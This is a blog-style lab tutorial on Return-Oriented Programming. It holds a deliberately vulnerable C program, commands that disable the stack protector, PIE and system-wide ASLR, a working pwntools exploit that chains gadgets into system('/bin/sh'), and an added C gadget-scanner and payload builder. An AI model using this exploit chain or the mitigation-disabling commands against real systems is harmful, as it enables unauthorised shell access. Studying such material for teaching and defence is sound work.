strangerRidingCaml

Linux kernel exploit

6. Return-Oriented Programming (ROP)

woddlwoddl 2024. 5. 12. 03:02
Return-Oriented Programming (ROP)

Return-Oriented Programming (ROP) is an exploitation technique for turning a control-flow hijack (typically a stack buffer overflow) into arbitrary behaviour on a target whose stack is not executable. Instead of injecting shellcode, the attacker overwrites the saved return address with a sequence of addresses of short instruction fragments that already exist in the program or its libraries and end in ret, called gadgets. Each ret pops the next address off the stack, so the chain runs gadget after gadget to load registers and call existing functions (for example system("/bin/sh")), execute arbitrary computation, or escalate privileges.

Lab Activity: Return-Oriented Programming (ROP) Attack

In this lab activity, we'll demonstrate a simple ROP attack on a vulnerable C program.

Defender Side Code:


#include <stdio.h>
#include <unistd.h>

/* Reads up to 256 bytes from stdin into a 64-byte stack buffer with no
 * bounds check. Anything past byte 64 overwrites the saved rbp and then this
 * function's saved return address, which is the bug the ROP chain rides on.
 * read() is used rather than strcpy() on argv because the 8-byte addresses in
 * the chain contain NUL bytes, which a C-string copy would stop at. */
void vulnerable_function(void) {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256);
}

int main(void) {
    vulnerable_function();
    return 0;
}

To compile the defender side code (modern GCC enables the stack protector and PIE by default; both must be off so the overflow reaches the return address unnoticed and the gadget sits at a fixed address, and ASLR must be disabled so the libc addresses used by the exploit stay the same between runs):

gcc -fno-stack-protector -no-pie -o vulnerable_program vulnerable_program.c
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Exploit Code (Python using pwntools):


from pwn import *

# Addresses of the gadget in the binary and of the libc symbols. These are
# the values from the author's environment; recompute them for your own build
# (for example ROPgadget --binary ./vulnerable_program for the gadget, and
# gdb with ASLR disabled for system() and "/bin/sh" inside libc).
pop_rdi_ret = 0x00400693      # gadget: pop rdi ; ret
system_addr = 0x7ffff7a52390  # address of system() in libc
bin_sh_addr = 0x7ffff7b97e9a  # address of the "/bin/sh" string in libc

# Padding to reach the saved return address: 64-byte buffer + 8-byte saved rbp
padding = b"A" * 72

# ROP chain: pop the "/bin/sh" pointer into rdi, then return into system()
rop_chain = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)

# Payload
payload = padding + rop_chain

# Start the vulnerable program locally (use remote(host, port) for a network target)
p = process("./vulnerable_program")

# Deliver the payload on stdin, where the target reads it
p.sendline(payload)

# Interact with the shell spawned by system("/bin/sh")
p.interactive()

The exploit builds a ROP chain that sets up the single argument to system() and then returns into it. The 72 bytes of padding cover the 64-byte buffer and the 8-byte saved rbp, so the first chain entry overwrites the saved return address. When vulnerable_function returns, execution lands on the pop rdi ; ret gadget, which loads the address of "/bin/sh" into rdi (the first-argument register in the x86-64 System V calling convention) and returns into system(), which spawns a shell that p.interactive() hands to the user.

Three things to check before running it. The addresses are placeholders from the author's environment: find your own pop rdi ; ret with ROPgadget --binary ./vulnerable_program (or in libc; glibc 2.34 and later no longer link __libc_csu_init, the usual source of that gadget in small non-PIE binaries) and read the system() and "/bin/sh" addresses out of libc in gdb with ASLR disabled. Every 64-bit user-space address contains NUL bytes, so the payload has to reach the stack through a length-based read such as read() on stdin; strcpy() or an argv string would stop at the first NUL and only the first gadget address would ever be copied. Finally, if system() crashes on a movaps instruction, the stack is not 16-byte aligned at the call; put the address of a lone ret gadget in front of system_addr to realign it.
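As an added example (not part of the original post), the following C program shows the two mechanical steps behind the exploit above: locating a gadget by scanning code bytes, and assembling the padded chain. SAMPLE_TEXT is a hand-assembled, constructed stand-in for a binary's .text section and TEXT_BASE an assumed load address; the libc values are the placeholders from the exploit above. Scanning at every byte offset finds the gadget twice: once where the compiler emitted pop rdi ; ret, and once inside the encoding of pop r15 ; ret, whose second byte (0x5f) is itself pop rdi. The NUL check is the reason the chain has to be delivered through read() rather than strcpy() or argv.

```c
/* Added example: gadget search and ROP chain assembly, in C.
 * SAMPLE_TEXT and TEXT_BASE are constructed stand-ins for a real .text
 * section and its load address (assumption); a real tool would read the
 * executable segment from disk and scan it the same way. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TEXT_BASE 0x400600ULL  /* assumed load address of SAMPLE_TEXT */

static const uint8_t SAMPLE_TEXT[] = {
    0x55,                    /*  0: push rbp                           */
    0x48, 0x89, 0xe5,        /*  1: mov  rbp, rsp                      */
    0x48, 0x83, 0xec, 0x40,  /*  4: sub  rsp, 0x40                     */
    0x5f,                    /*  8: pop  rdi   (intended gadget)       */
    0xc3,                    /*  9: ret                                */
    0x41, 0x5e,              /* 10: pop  r14                           */
    0x41, 0x5f,              /* 12: pop  r15   (byte 13 alone = pop rdi) */
    0xc3,                    /* 14: ret        (unintended pop rdi; ret) */
    0x5e, 0xc3,              /* 15: pop  rsi ; ret                     */
    0xc9, 0xc3,              /* 17: leave ; ret                        */
};

/* Count occurrences of pat (a gadget's encoding) in code, storing up to
 * max_out offsets. Every byte offset is tried, not only instruction
 * boundaries, which is how "unintended" gadgets turn up. */
size_t find_gadget(const uint8_t *code, size_t len,
                   const uint8_t *pat, size_t plen,
                   size_t *out, size_t max_out)
{
    size_t n = 0;
    if (plen == 0 || len < plen) return 0;
    for (size_t i = 0; i + plen <= len; i++) {
        if (memcmp(code + i, pat, plen) == 0) {
            if (n < max_out) out[n] = i;
            n++;
        }
    }
    return n;
}

/* p64() equivalent: write v as 8 little-endian bytes. */
static void put_u64le(uint8_t *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++) dst[i] = (uint8_t)(v >> (8 * i));
}

/* Assemble padding + chain into out. Returns the payload length, or 0 if cap
 * is too small. pad is the distance from the start of the overflowed buffer
 * to the saved return address (64-byte buffer + 8-byte saved rbp = 72). */
size_t build_chain(uint8_t *out, size_t cap, size_t pad,
                   const uint64_t *words, size_t nwords)
{
    size_t total = pad + 8 * nwords;
    if (total > cap) return 0;
    memset(out, 'A', pad);
    for (size_t i = 0; i < nwords; i++)
        put_u64le(out + pad + 8 * i, words[i]);
    return total;
}

/* Index of the first NUL byte in buf, or -1 if none. A NUL before the end is
 * where strcpy() and the kernel's argv copy would stop, so nothing after it
 * would reach the stack. */
long first_nul(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0) return (long)i;
    return -1;
}

int main(void)
{
    static const uint8_t pop_rdi_ret[] = { 0x5f, 0xc3 };
    size_t offs[8];
    size_t n = find_gadget(SAMPLE_TEXT, sizeof SAMPLE_TEXT,
                           pop_rdi_ret, sizeof pop_rdi_ret, offs, 8);
    if (n == 0) { puts("pop rdi; ret not found"); return 1; }
    for (size_t i = 0; i < n; i++)
        printf("pop rdi; ret at 0x%llx\n",
               (unsigned long long)(TEXT_BASE + offs[i]));

    /* Same chain as the exploit above: pop rdi; ret / "/bin/sh" / system() */
    uint64_t words[] = { TEXT_BASE + offs[0], 0x7ffff7b97e9aULL, 0x7ffff7a52390ULL };
    uint8_t payload[128];
    size_t len = build_chain(payload, sizeof payload, 72, words, 3);
    printf("payload length %zu, first NUL at index %ld\n",
           len, first_nul(payload, len));
    return 0;
}
```

Compile with gcc -o rop_demo rop_demo.c and run it: the scan reports the gadget at 0x400608 and 0x40060d, and the 96-byte payload has its first NUL at index 75, three bytes into the first address, which is exactly the byte a C-string copy would stop at.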